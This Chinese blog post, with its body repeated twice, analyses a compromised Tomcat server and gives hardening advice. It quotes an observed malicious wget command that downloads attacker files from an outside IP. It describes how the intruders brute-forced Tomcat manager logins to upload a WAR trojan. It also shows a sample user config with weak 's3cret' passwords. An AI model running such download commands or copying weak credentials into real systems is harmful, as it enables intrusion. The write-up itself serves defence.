如何配置安全的tomcat服务器?
运用场景:
公司的阿里云服务器发生了恶意扫描风险(密码破解拦截事件),通过工具Private Shell ssh上服务器,执行ps -ef指令,发现有n个如下两种进程:
daemon 7519 4313 0 14:23 ? 00:00:00 /usr/sbin/sshd
daemon 19444 1 0 14:09 ? 00:00:00 wget -O .tmp http://217.217.198.42/.a.php?request=PlcmSpIp:PlcmSpIp:111.100.120.135
分析两个进程:
第一个进程:sshd是ssh服务,怎么会有这么多ssh服务被开启呢?这些服务是如何被执行的呢?
第二个进程:wget -O是从某服务器上下载文件,并以文件名.tmp命名保存到本地,.tmp文件是干什么的呢?黑客又是通过什么手段操纵服务器从其他服务器上下载文件呢?
问题追踪:
首先找到.tmp文件,看看服务器从远程服务器上下载了什么文件,打开.tmp文件,发现了里面有一个.new6目录,进入new目录,发现里面有txt文件,log文件和脚本文件等.
对这些文件进行分析,得出结论:黑客通过执行这些脚本对配置在文件中的服务器进行恶意扫描,并根据配置文件中的用户名和密码对服务器暴力破解,所以ps -ef会发现有很多ssh服务开启了,
换句话说,黑客把我们的服务器当成了"肉鸡",追踪到这里,问题又来了,黑客是通过什么手段操纵服务器从其他服务器上下载这些文件呢?
无意间想起:可以通过tomcat服务上传文件,于是执行ps -ef | grep tomcat指令,发现tomcat启动着,进入tomcat安装目录,打开conf/tomcat-user.xml配置文件,
在这个配置文件中配置了用户,原来黑客首先对tomcat用户进行破解,然后登陆tomcat后台管理系统,点击Manager App,这样黑客就可以通过tomcat上传打包为war的病毒文件了,
上传到服务器后,再运行.
Tomcat服务默认是以system权限运行的,因此该jsp木马就继承了其权限,几乎可以对Web服务器进行所有的操作。比如启动服务、删除/创建/修改文件、创建用户等等,
更有甚者,通过这种方式上传一个工具,利用其开启服务器的远程桌面,至此,亲,你的整个服务器就沦陷了,恭喜你了.
解决方案:
如何配置安全的tomcat服务器?
将tomcat上传到服务器后,删除tomcat安装目录下的如下文件:
webapps/docs,webapps/examples,webapps/manager,webapps/host-manager,conf/tomcat-user.xml等.
删除这些文件后,你的tomcat就相对安全了.
注意:
1.肉鸡就是被黑客攻破,种植了木马病毒的电脑.黑客可以随意操纵它并利用它做任何事情,它就象傀儡.
肉鸡可以是各种系统:windows,linux和unix等,更可以是一家公司,企业,学校,甚至是政府军队的服务器.
2.如何为tomcat配置用户?
在tomcat的安装目录下conf/tomcat-user.xml文件中添加如下内容:
<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat1" password="s3cret" roles="admin-gui"/>
<user username="tomcat2" password="s3cret" roles="manager-gui"/>
<user username="tomcat3" password="s3cret" roles="admin-gui,manager-gui"/>
tomcat提供了两个管理程序:admin和manager,其中admin用于管理和配置tomcat服务器,manager用于管理部署到tomcat服务器中的web应用程序.
对于Tomcat首页上面的三个按钮,其中,Server Status和Manager App需要manager-gui,Host Manager需要admin-gui.
运用场景:
公司的阿里云服务器发生了恶意扫描风险(密码破解拦截事件),通过工具Private Shell ssh上服务器,执行ps -ef指令,发现有n个如下两种进程:
daemon 7519 4313 0 14:23 ? 00:00:00 /usr/sbin/sshd
daemon 19444 1 0 14:09 ? 00:00:00 wget -O .tmp http://217.217.198.42/.a.php?request=PlcmSpIp:PlcmSpIp:111.100.120.135
分析两个进程:
第一个进程:sshd是ssh服务,怎么会有这么多ssh服务被开启呢?这些服务是如何被执行的呢?
第二个进程:wget -O是从某服务器上下载文件,并以文件名.tmp命名保存到本地,.tmp文件是干什么的呢?黑客又是通过什么手段操纵服务器从其他服务器上下载文件呢?
问题追踪:
首先找到.tmp文件,看看服务器从远程服务器上下载了什么文件,打开.tmp文件,发现了里面有一个.new6目录,进入new目录,发现里面有txt文件,log文件和脚本文件等.
对这些文件进行分析,得出结论:黑客通过执行这些脚本对配置在文件中的服务器进行恶意扫描,并根据配置文件中的用户名和密码对服务器暴力破解,所以ps -ef会发现有很多ssh服务开启了,
换句话说,黑客把我们的服务器当成了"肉鸡",追踪到这里,问题又来了,黑客是通过什么手段操纵服务器从其他服务器上下载这些文件呢?
无意间想起:可以通过tomcat服务上传文件,于是执行ps -ef | grep tomcat指令,发现tomcat启动着,进入tomcat安装目录,打开conf/tomcat-user.xml配置文件,
在这个配置文件中配置了用户,原来黑客首先对tomcat用户进行破解,然后登陆tomcat后台管理系统,点击Manager App,这样黑客就可以通过tomcat上传打包为war的病毒文件了,
上传到服务器后,再运行.
Tomcat服务默认是以system权限运行的,因此该jsp木马就继承了其权限,几乎可以对Web服务器进行所有的操作。比如启动服务、删除/创建/修改文件、创建用户等等,
更有甚者,通过这种方式上传一个工具,利用其开启服务器的远程桌面,至此,亲,你的整个服务器就沦陷了,恭喜你了.
解决方案:
如何配置安全的tomcat服务器?
将tomcat上传到服务器后,删除tomcat安装目录下的如下文件:
webapps/docs,webapps/examples,webapps/manager,webapps/host-manager,conf/tomcat-user.xml等.
删除这些文件后,你的tomcat就相对安全了.
注意:
1.肉鸡就是被黑客攻破,种植了木马病毒的电脑.黑客可以随意操纵它并利用它做任何事情,它就象傀儡.
肉鸡可以是各种系统:windows,linux和unix等,更可以是一家公司,企业,学校,甚至是政府军队的服务器.
2.如何为tomcat配置用户?
在tomcat的安装目录下conf/tomcat-user.xml文件中添加如下内容:
<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat1" password="s3cret" roles="admin-gui"/>
<user username="tomcat2" password="s3cret" roles="manager-gui"/>
<user username="tomcat3" password="s3cret" roles="admin-gui,manager-gui"/>
tomcat提供了两个管理程序:admin和manager,其中admin用于管理和配置tomcat服务器,manager用于管理部署到tomcat服务器中的web应用程序.
对于Tomcat首页上面的三个按钮,其中,Server Status和Manager App需要manager-gui,Host Manager需要admin-gui.
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
